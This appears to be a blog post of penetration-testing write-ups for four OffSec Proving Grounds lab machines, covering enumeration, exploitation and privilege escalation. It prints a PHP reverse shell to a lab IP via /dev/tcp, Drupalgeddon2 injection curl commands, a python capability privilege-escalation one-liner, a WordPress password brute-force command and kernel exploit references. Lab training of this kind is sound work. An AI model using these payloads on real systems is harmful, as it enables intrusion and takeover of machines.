Post

OffSec PG - Katana, Lampiao, Loly, Monitoring

Katana

Enumeration

Machine IP → 192.168.51.83

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.51.83

OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))
7080HTTPSLitespeed httpd
8088HTTPLitespeed httpd
8715HTTPnginx 1.14.2

Therefore, a bunch of ports are open for http → 80, 7080, 8088, 8715, ftp on port 21 and ssh on port 22.

Web Scan

GoBuster scan → gobuster dir -u http://192.168.51.83 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

The result for the port 7080 revealed nothing. The scan for port 80 resulted in the following finds →

  • ebook/ (301)
  • server-status (403)

Directories/files listed for port 8088 →

  • index.html
  • cgi-bin/ (301)
  • img/ (301)
  • docs/ (301)
  • upload.html
  • upload.php
  • css/ (301)
  • protected/ (301)
  • blocked/ (301)
  • phpinfo.php

The scan for the port 8715 revealed nothing.

Exploitation

Looking at the status codes 200 for the enumeration of port 8088, there are two files upload.html and upload.php. These are connected and are an upload capability. Uploading a file on the port 8088 website allows for the file to be accessed on a different web server. This web server is that running on port 8715. However, after testing txt and php files, php files are accessible while txt files need a password. Therefore, a php file can be used to create a reverse shell. Used the following php payload for the reverse shell →

1
2
3
<?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.49.187/3002 0>&1'");
?>

A good resource for a reverse shell is Pentest Monkey PHP reverse shell.

Privilege Escalation

The reverse shell, therefore is the www-data user on the machine. This gives the user flag. Checked sudo capabilities for the user, but there were none. Search for setuid binaries did not give any results as well.

The next checks are to be made for capabilities. Used getcap -r / 2>/dev/null to list files with capabilities set. The result includes the entry → /usr/bin/python2.7 = cap_setuid+ep.

Therefore, the following python code can be invoked using the said binary to elevate privileges → /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'. This gives the root flag.


Lampiao

Enumeration

Machine IP → 192.168.56.48

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.56.48

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80HTTP?-
1898HTTPApache httpd 2.4.7 ((Ubuntu)) & Drupal 7

Web Scan

Robots.txt check by nmap listed a ton of directories and files for all user agents. Therefore, listed the entire file using curl, which resulted in the following interesting entries →

  • admin/
  • user/register/
  • user/password/
  • user/login/
  • ?q=admin
  • ?q=comment/reply/
  • ?q=user/register/
  • ?q=user/password/

GoBuster scan → gobuster dir -u http://192.168.56.48 -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Directories/files listed were common with robots.txt finding and the important ones were →

  • install.php
  • update.php
  • cron.php
  • xmlrpc.php
  • index.php
  • misc/
  • scripts/
  • includes/
  • sites/
  • modules/
  • themes/

Exploitation

Nothing in the directory and file brute force was particularly interesting. The /CHANGELOG.txt file can be looked at to identify the exact version of software running on the server. This revealed the latest version to be Drupal 7.54.

A particular exploit from Google-fu is the drupalgeddon2. For the version 7.5X, the PoC for the ?q=user/password would work well. The exploit is basically a lack of input validation in Drupal 7 Form API. This attack targets AJAX requests composed of Drupal Form API’s renderable arrays, which are used to render a requested page through Drupal’s theming system.

Renderable arrays are implemented by an associative array and pass key-value pairs as function arguments or form data in order to render markup and UI elements in a meaningful way. Markup element properties have keys prefixed with the ‘#’ character. These parameters were not sanitized. The exploit code had to target the rendering phase of either a page load or AJAX request with malicious code passed to one of the Form API executable functions. The 4 possibilities were →

  1. [#post_render]
  2. [#pre_render]
  3. [#access_callback]
  4. [#lazy_builder]

To exploit, the following set of 2 commands can be executed to get the result of a bash command on the server →

1
2
3
4
5
6
7
8
9
10
11
### 1st command - payload is "which nc" to check if nc is there on the system.
url_pre="http://192.168.56.48:1898/?q=user/password&name"
url_post="$url_pre\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]="
final_url="$url_post=which+nc"
form_data=$( curl -k -s $(echo final_url) --data "form_id=user_pass&_triggering_element_name=name")
form_build=$(echo form_data | grep form_build_id)
form_build_id=$(echo form_build | sed -E 's/.*name="form_build_id" value="(.*)".*/\1/' )

### 2nd command, which returns the result of the above payload.
curl -k -i "http://192.168.56.48:1898/?q=file/ajax/name/%23value/${form_build_id}" \
    --data "form_build_id=${form_build_id}"

This gave an indication that nc was present on the system, therefore a reverse shell could be generated for it.

However, an nc shell did not work. It is known that there is php on the system. Therefore, after checking the presence of wget, the php reverse shell from pentest monkey is sent to the server. With a local netcat listener and navigating to the reverse shell path, a shell with the user www-data is obtained.

Privilege Escalation

User

Looking at /etc/passwd, a number of users are determined. SetUID binaries do not have any interesting information. The /etc/passwd contains the hashed password for the root user. This was sent to john for a cracking attempt, which did not reveal anything.

Listing the /home directory shows the presence of a user tiago. Google-fu for default drupal config files reveals the location as settings.php file inside the sites/default/ directory. This reveals the mysql database connection credentials as drupaluser:Virgulino. Trying the password for the user tiago successfully logs in. This gives the user flag.

Root

The tiago user is not allowed to run sudo either. Therfore, looking at other information and running the linux enumeration script. Looking at the kernel version, which is 4.4.0, Google-fu points to the presence of the Dirty Cow exploit.

Therefore, looking at PoCs from Dirty Cow PoCs, choosing the cowroot.c payload to get the root shell. Therefore, compiling for 32 bit version to match target. Compiled it with gcc and sent the binary to the target machine via wget.

Executing this gives the root shell and thus the root flag.


Loly

Enumeration

Machine IP → 192.168.225.121

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.225.121

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
80HTTPnginx 1.10.3 (Ubuntu)
6311--

Web Scan

GoBuster scan → gobuster dir -u http://192.168.225.121 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed → wordpress/

Busting the /wordpress/ directory gives the following result →

  • index.php (301)
  • wp-content/
  • wp-login.php
  • license.txt
  • wp-includes/ (403)
  • readme.html
  • wp-trackback.php
  • wp-admin/ (302)

WPScan determines generic stuff and a user loly. Using this for a brute force attack with command docker run -v /home/tanq/installations/SecLists/:/seclists/ -it --rm wpscanteam/wpscan --url http://192.168.225.121/wordpress/ -U loly -P /seclists/rockyou.txt gives the credentials as loly:fernando for XMLRPC.

Exploitation

Logging in to the /wordpress/wp-login.php as loly may work but does not move forward because of the requests being directed at http://loly.lc instead of the IP address. Therefore, this entry is added to /etc/hosts to enable navigation. Then the login page is visited and login is attempted as loly. This grants the admin page on the wordpress website.

The homepage has a plugin called Adrotate running. On this webpage, a section called “Manage Media”. This says →

1
2
3
4
5
Accepted files: jpg, jpeg, gif, png, svg, html, js and zip. Maximum size is 512Kb per file.
Important: Make sure your file has no spaces or special characters in the name. Replace spaces
with a - or _. Zip files are automatically extracted in the location where they are uploaded
and the original zip file will be deleted once extracted. You can create top-level folders below.
Folder names can between 1 and 100 characters long. Any special characters are stripped out.

Therefore, uploading a reverse shell php code after zipping and uploading could allow navigating to it. The content is stored in the /wordpress/wp-content/banners/ directory. Therefore, a shell is gained by listening on netcat and navigating to the php file in the said path. This is as the user www-data and this gives the user flag.

Privilege Escalation

User

Looking at the wordpress files, the wp-config.php file contains a password lolyisabeautifulgirl. Trying this password for loly, it works and grants the shell as loly.

Root

Looking at the kernel version for the machine (4.4.0-31), there are a list of exploits. Starting with exploits from the highest 4.X version, one worked (45010.c). This gave the root shell and thus the root flag.


Monitoring

Enumeration

Machine IP → 192.168.51.136

Network Scan

Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.51.136

OS Detection → Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25SMTPPostfix smtpd
80HTTPApache httpd 2.4.18 ((Ubuntu))
389LDAPOpenLDAP 2.2.X - 2.3.X
443HTTPSApache httpd 2.4.18 ((Ubuntu))
5667Unknown-

Web Scan

GoBuster scan → gobuster dir -u http://192.168.51.136 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Directories/files listed (for both http and https versions) →

  • index.php
  • javascript/
  • nagios/

Visiting the web page reveals a nagiosxi directory which has a login.

Exploitation

A web search for default admin credentials on nagios xi reveals nagiosadmin:PASSW0RD, however, after trial and error of easy passwords, admin was the correct password.

Searchsploit and web searches return a number of exploits for the nagios version. One of them is an authenticated RCE in the mointoring plugin upload capability.

Command used for searchsploit is as follows → searchsploit nagios, which returned many results. Spiraling down to RCE for version 5.6.5 (just above 5.6.0 and has root exploit), the full path can be received as follows → searchsploit -p php/webapps/47299.php. This gives the path and the exploit can be copied from there.

The exploit is basically a file upload where the name for the upload has an injection of commands such that it is executed in the backend. Therefore, a reverse shell can be executed on the backend, giving root access.

Setting up the exploit and calling it via the cli after setting up an ncat listener, a root shell is received. The flag of the root user can thus be read.

Privilege Escalation

User was already root, therefore, no escalation was necessary.


This post is licensed under CC BY 4.0 by the author.